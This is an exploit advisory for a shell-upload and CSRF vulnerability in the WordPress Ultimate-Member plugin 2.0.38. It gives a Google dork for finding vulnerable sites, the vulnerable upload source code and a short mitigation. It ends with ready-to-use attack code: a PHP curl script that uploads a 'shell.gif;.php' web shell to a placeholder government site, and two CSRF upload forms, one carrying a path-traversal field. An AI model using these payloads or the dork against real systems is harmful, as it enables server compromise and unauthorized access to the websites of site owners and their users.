WordPress Ultimate-Member 2.0.38 Cross Site Request Forgery / Shell Upload

`####################################################################  
  
# Exploit Title : WordPress Ultimate-Member Plugins 2.0.38 CSRF Shell Upload  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 05/02/2019  
# Vendor Homepage : ultimatemember.com  
# Software Download Link : downloads.wordpress.org/plugin/ultimate-member.2.0.38.zip  
# Software Information Links : wordpress.org/plugins/ultimate-member/  
# Software Vulnerable Source Codes :  
github.com/wp-plugins/ultimate-member/blob/master/core/lib/upload/um-file-upload.php  
github.com/wp-plugins/ultimate-member/blob/master/core/lib/upload/um-image-upload.php  
# Software Version : 1.3.21 and 2.0.38 - other previous versions.  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/ultimate-member/''  
# Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ]  
CWE-264 [ Permissions, Privileges, and Access Controls ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
Ultimate Member is the #1 user profile & membership plugin for WordPress.   
  
The plugin makes it a breeze for users to sign-up and become members of your website.   
  
The plugin allows you to add beautiful user profiles to your site and is perfect  
  
for creating advanced online communities and membership sites.  
  
Lightweight and highly extendible, Ultimate Member will enable you to create almost   
  
any type of site where users can join and become members with absolute ease.  
  
####################################################################  
  
# Impact :  
***********  
  
* The software allows the attacker to upload or transfer files of dangerous types   
  
that can be automatically processed within the product's environment.  
  
* This software WordPress Ultimate-Member Plugins is prone to a vulnerability   
  
that lets attackers upload arbitrary files and shell because it fails to adequately sanitize user-supplied input.   
  
An attacker can exploit this vulnerability to upload arbitrary code and execute   
  
it in the context of the webserver process.   
  
This may facilitate unauthorized access or privilege escalation; other attacks are also possible.  
  
Attackers can exploit this issue through a browser.   
  
System Compromise - Remote attackers can gain control of vulnerable systems.  
  
####################################################################  
  
# Remote File Upload/Shell Upload Exploit :  
***************************************  
/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php  
  
# Directory File Path :  
*******************  
  
/wp-content/uploads/ultimatemember/temp/.....  
  
/wp-content/uploads/.....  
  
####################################################################  
  
# Vulnerability Error :  
*******************   
{"error":"A theme or plugin compatibility issue"}  
  
# Vulnerable Source Code => [ um-image-upload.php ]  
************************  
<?php  
$i = 0;  
$dirname = dirname( __FILE__ );  
do {  
$dirname = dirname( $dirname );  
$wp_load = "{$dirname}/wp-load.php";  
}  
while( ++$i < 10 && !file_exists( $wp_load ) );  
require_once( $wp_load );  
global $ultimatemember;  
$id = $_POST['key'];  
$ultimatemember->fields->set_id = $_POST['set_id'];  
$ultimatemember->fields->set_mode = $_POST['set_mode'];  
$ret['error'] = null;  
$ret = array();  
if(isset($_FILES[$id]['name'])) {  
if(!is_array($_FILES[$id]['name'])) {  
  
$temp = $_FILES[$id]["tmp_name"];  
$file = $_FILES[$id]["name"];  
$file = sanitize_file_name($file);  
  
$error = $ultimatemember->files->check_image_upload( $temp, $id );  
if ( $error ){  
  
$ret['error'] = $error;  
  
} else {  
  
$ret[] = $ultimatemember->files->new_image_upload_temp( $temp, $file, um_get_option('image_compression') );  
  
}  
}  
  
} else {  
$ret['error'] = __('A theme or plugin compatibility issue','ultimatemember');  
}  
echo json_encode($ret);  
  
####################################################################  
  
# Vulnerable Source Code => [ um-file-upload.php ]  
***************************  
  
<?php  
$i = 0;  
$dirname = dirname( __FILE__ );  
do {  
$dirname = dirname( $dirname );  
$wp_load = "{$dirname}/wp-load.php";  
}  
while( ++$i < 10 && !file_exists( $wp_load ) );  
require_once( $wp_load );  
global $ultimatemember;  
$id = $_POST['key'];  
$ultimatemember->fields->set_id = $_POST['set_id'];  
$ultimatemember->fields->set_mode = $_POST['set_mode'];  
$ret['error'] = null;  
$ret = array();  
if(isset($_FILES[$id]['name'])) {  
if(!is_array($_FILES[$id]['name'])) {  
  
$temp = $_FILES[$id]["tmp_name"];  
$file = $_FILES[$id]["name"];  
$file = sanitize_file_name($file);  
$extension = pathinfo($file, PATHINFO_EXTENSION);  
  
$error = $ultimatemember->files->check_file_upload( $temp, $extension, $id );  
if ( $error ){  
$ret['error'] = $error;  
} else {  
$ret[] = $ultimatemember->files->new_file_upload_temp( $temp, $file );  
$ret['icon'] = $ultimatemember->files->get_fonticon_by_ext( $extension );  
$ret['icon_bg'] = $ultimatemember->files->get_fonticon_bg_by_ext( $extension );  
$ret['filename'] = $file;  
}  
}  
  
} else {  
$ret['error'] = __('A theme or plugin compatibility issue','ultimatemember');  
}  
echo json_encode($ret);  
  
####################################################################  
  
# Solution :  
******************  
  
Temporary solution to this is to disable the image upload functionality,   
  
which can be done by adding the following lines  
  
$ret['error'] = __('Functionality disabled');  
exit(json_encode($ret));  
  
directly below the line  
  
function ajax_image_upload() {  
  
in the file /includes/core/class-files.php  
  
####################################################################  
  
# PHP Exploiter =>   
********************  
  
<?php  
  
$uploadfile="shell.gif;.php";  
  
$ch = curl_init("http://VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php");  
  
curl_setopt($ch, CURLOPT_POST, true);  
  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
  
array('Filedata'=>"@$uploadfile",'folder'=>'/wp-content/uploads/ultimatemember/temp/'));  
  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
  
$postResult = curl_exec($ch);  
  
curl_close($ch);  
  
print "$postResult";  
  
?>  
  
####################################################################  
  
# CSRF Cross Site Request Forgery Exploiter 1 :  
******************************************  
  
<form enctype="multipart/form-data"  
action="http://VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php" method="post">  
Your File: <input name="uploadfile" type="file" /><br />  
<input type="hidden" name="dir_icons" value="../../../../">  
<input type="submit" value="upload" />  
</form>  
  
####################################################################  
  
# CSRF Cross Site Request Forgery Exploiter 2 :  
******************************************  
  
<html>  
<body>  
<form enctype="multipart/form-data" action="VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-file-upload.php" method="post">  
Your File: <input name="files[]" type="file" /><br />  
<input type="submit" value="Successfull!" />  
</form>  
</body>  
</html>  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`